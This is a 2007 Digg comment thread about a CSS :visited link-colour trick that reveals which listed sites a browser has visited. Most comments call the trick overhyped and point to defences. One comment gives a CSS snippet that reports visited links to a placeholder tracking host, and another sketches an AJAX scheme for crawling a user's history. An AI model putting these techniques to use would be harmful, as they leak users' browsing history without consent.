What is Digg?Warning: The Content in this Article May be Inaccurate
Readers have reported that this story contains information that may not be accurate.Sponsored by Lost University
LOST Season 5 lands on Blu-ray(tm) & DVD Dec 8 view!
lostuniversity.org/ - Check out the 5-disc collection complete with deleted scenes and new bonus features.
158 Comments
- Dakana, on 10/12/2007, -3/+48Buried as inaccurate.
It doesn't search your history; it checks to see if you've been to the listed sites. - radiofrequency, on 10/12/2007, -6/+48That's frikkin' genius. He's writing links to popular websites in the document and checking to see if the links are the color of a visited link. I wish I were that cutting edge.
- stratedge, on 10/12/2007, -3/+40It's a neat trick, but the title of both this and the original article are totally misleading. It's not reading your history, it's just testing if you've been to any of a list of web sites. HUGE DIFFERENCE. For me, using firefox, it did not find any sites I had been to.
Again, I don't deny that it's neat, but it's not nearly as good an 'exploit' as the author claims with his title. - sepi, on 10/12/2007, -5/+38a direct link to the _javascript_ trick (bypassing the blog link):
http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html - ccanni1028, on 10/12/2007, -3/+25"but I strongly think that MS is great because they are VERY fast at releasing code fixes and updates."
Where have you been living? Unless the update is CRITICAL to them (and not even always then), it won't be relased until the second Tuesday of the month, when they do their bulk Windows Update release. - nevenmrgan, on 10/12/2007, -3/+25Wow. According to this groundbreaking tool, I've been to
http://www.google.com/
Ya think? - DerGeist, on 10/12/2007, -0/+20IE7 RC1 doesn't "block" the site, the Javascript is written to only perform the so-called "exploit" (and I use the term loosely) on mozilla-based browsers.
IE7 would be just as susceptible. - doctornkul, on 10/12/2007, -1/+20The downside of the trick is that it'll only show a site if you went to the root of the site (didn't name any files or folders). This means that the exploit won't register:
1) Many google searches (and therefore searches typed into the address bar) that automatically link to a non-root page
2) Most links that you follow - chances are that they won't link to amazon.com, but rather something like amazon.com/exec/obiodo..., which won't be registered. None of the digg links you follow will be registered.
Basically the only websites it will register are the ones you type into the address bar and those with google search results pointing to the root. That leaves a very large hole, especially for people who surf like me, typing website names into the address bar instead of actually typing .com every time, and actually jumping from website to website more frequently through links than through typing the address.
Also, the algorithm is also very inefficient. For one it needs to try each and every one of the websites that it's looking for, which may mean thousands or more if it wants to be complete. This, however, means that if a website is not in its database, it won't find it. And I won't even go into how bad searching for all permutations is. The good side for the exploiter is that it all happens on the client computer, so it's not so CPU-intensive for them.
I would say that this "exploit" is roughly as serious as a tracking cookie when used realistically, and the best way to avoid this is to simply not allow CSS to look at link colors (by this I mean that the standards should be changed). I'm more of a programmer than a web developer, but I don't think that the ability to look at link colors are very neccesary. Perhaps somebody more experienced can tell me why web developers need that feature. - kimos, on 10/12/2007, -0/+18Amazes me that people still can't figure out the difference between Java and JavaScript...
- gordonchiam, on 10/12/2007, -10/+28very clever trick
- Prometheus, on 10/12/2007, -2/+19It knows I've been to google.com! That narrows down my identity!
- MajorD, on 10/12/2007, -2/+18"You have not been to http://www.digg.com/"
hmm. - merreborn, on 10/12/2007, -0/+14When this got frontpaged a couple days ago, someone pointed out there's been a bug report on this in Mozilla's bug database since 2002.
- inactive, on 10/12/2007, -2/+16I agree, clever, but the title is misleading. I thought it wasn gonna hack into your chrome:// somehow, not just be a list of popular sites.
- weird0science, on 10/12/2007, -4/+18I use NOSCRIPT extension. Stops this type of thing from happening.
https://addons.mozilla.org/firefox/722/ - ilovenicotine, on 10/12/2007, -0/+12SafeHistory
https://addons.mozilla.org/firefox/1502/
Makes it so websites only see the history from their domain - MrViklund, on 10/12/2007, -6/+17@Pkkid
"I strongly think that MS is great because they are VERY fast at releasing code fixes and updates."
Haha are you joking? - Daiken, on 10/12/2007, -5/+14lol, how stupid. Nothing came up for me. Marked as inaccurate.
- tehJR, on 10/12/2007, -2/+11and I've been to www.cnn.com
Alert the internets... - Markie1006, on 10/12/2007, -2/+11it's not really accessing the history as such, just checking against it's own 'known list'.
If you have something in your history that is not in the known list, it won't appear.
i.e. I have a ton of entries in my history, and it only managed to show one - slashdot.
Marked as inaccurate AND a dupe. (if only I could). - crazaalex, on 10/12/2007, -7/+15Won't work if you have noscript extension.
- iNoles, on 10/12/2007, -5/+13I try it in Bon Echo Beta 2, its show nothing to display.
Marked as inaccurate. - cryptoknight, on 10/12/2007, -3/+11I have browser history set to 0 in my firefox settings and this site finds no history for me. why do you need browser history anyways isnt that what bookmarks are for?
- scottschiller, on 10/12/2007, -0/+8Just to play devil's advocate here, you could do something like
a:visited {
background-image:url(http://whatever/track.php?url=someURLHere);
}
.. You'd have to disable CSS, regrettably, for that one to be blocked. ;) - nofxjunkee, on 10/12/2007, -0/+8No, bookmarks are for saving certain sites you're sure you want to read again in the future. The history is for when you go "oh *****, now which one of the sites I 100 visited in the last few days was this specific piece of information on?"
- ccanni1028, on 10/12/2007, -3/+10I don't have my history saved. It stops things like this from happening.
- tizz66, on 10/12/2007, -11/+18It's not really a browser hack anyway, it's more a standards hack. Ironically IE isn't affected (by this code anyway, not including ports) because it doesn't support the standard properly.
- CedEx, on 10/12/2007, -1/+8It's really going to suck for him if I don't visit any of those sites he's painstakingly typed into his code.
- 0siris, on 10/12/2007, -5/+12No it doesnt... millions of people every day use google across the countr-...
wait, you were kidding...
I knew that.
Carry On. - PolyVector, on 10/12/2007, -1/+8of course it doesn't work in IE... didn't anybody notice the "if (is_mozilla)" line? maybe I'm missing something here?
- ghostbyte, on 10/12/2007, -0/+6:visited support allows queries into global history
Posted 2002-05-28 This has been around for a long time.
https://bugzilla.mozilla.org/show_bug.cgi?id=147777 - br0ck, on 10/12/2007, -1/+7@MajorD - Look up in your address bar and notice you are NOT at WWW.digg.com. Try http://digg.com ... worked for me.
- nofxjunkee, on 10/12/2007, -0/+6It does in FF 2 beta 1 here on my Mac.
- kimos, on 10/12/2007, -2/+8@ilovenicotine
Sorry, I didn't quite catch what you said.
What about exploiting your ass? - NiLeS, on 10/12/2007, -0/+6@ doctornkul :
Chaging link colors are useful if I change the text background. When I have a blue background, I still want you to see the links, say by changing from blue to white. - mc7winkie, on 10/12/2007, -5/+11Stop post spamming. Period.
- Markie1006, on 10/12/2007, -6/+12I would help you out and send the internet to you on a disk, but I think the tubes are clogged on my end.
- loneBoat, on 10/12/2007, -1/+6Heh-heh. I have FF set to clear my cache every time I close it, so when I tried it, it said:
"I know where you've been: www.google.com"
Google is my homepage, so whoo boy, I'm really scared now! You know I've been to google.com!
Okay, bury me. I just thought it was funny... - SweetsGreen, on 10/12/2007, -4/+9so all I'd have to do is modify the websites[] array to contain every site every and I'd have somthing usefull.
- SteelChicken, on 10/12/2007, -1/+6agreed. if it doesn't scan for a particular URL, it won't show up.
a neat hack, but hardly awe-inspiring. - br0ck, on 10/12/2007, -1/+6@mojaam - noscript let's you whitelist sites to allow javascript one time or permanently.
- nicerobot, on 10/12/2007, -0/+5How about an extension of this technique. If it finds sites in your history, send them to the server (hurray for AJAX), the server can get all the links from the page, send the links back to the client and process them the same way. Now it can crawl your history.
- Moskie, on 10/12/2007, -0/+5how would you actually populate the 'someURLHere' value?
- duodave, on 10/12/2007, -1/+6I'm not impressed. Now, if he had somehow linked this to a DNS server, then I'd be impressed. As it is, it only showed my four sites I'd visited, and very common ones at that.
- LuTze, on 10/12/2007, -0/+5The summary is misleading and inaccurate. The hack had not been ported to work on IE. If you read the comments below on
http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html
There is a working port for IE, which "picks up the history" from IE7RC1. Not really a case about IE7RC1 being "smart". - Otto, on 10/12/2007, -0/+5doctornkul: As a proof of concept though, it's still interesting. Basically he's not checking the history at all, he's creating a hidden table with links to all the sites, and setting a visited style on each one with a different color, then checking for colors of the resulting hidden links. Slow, yes, but it might get somebody else thinking and find a real hole there.
- Splitt3rxx, on 10/12/2007, -1/+5I take back what is said, how ***** ironic
http://img.photobucket.com/albums/v116/guinea_pig_slave/operacrash5.png - KnightMareInc, on 10/12/2007, -2/+6is the history sent to him or is this just LOL your IP is $ip
- miken32, on 10/12/2007, -0/+4Probably mentioned in the other duplicate stories, but this is not new.
http://www.w3.org/TR/CSS21/selector.html#link-pseudo-classes
"Note. It is possible for style sheet authors to abuse the :link and :visited pseudo-classes to determine which sites a user has visited without the user's consent.
UAs may therefore treat all links as unvisited links, or implement other measures to preserve the user's privacy while rendering visited and unvisited links differently." - inactive, on 10/12/2007, -1/+5Yes, apparently what we're missing is an obfuscated attempt to discredit FF....
-
Show 51 - 100 of 159 discussions
© Digg Inc. 2009
— Content created and posted by Digg users is 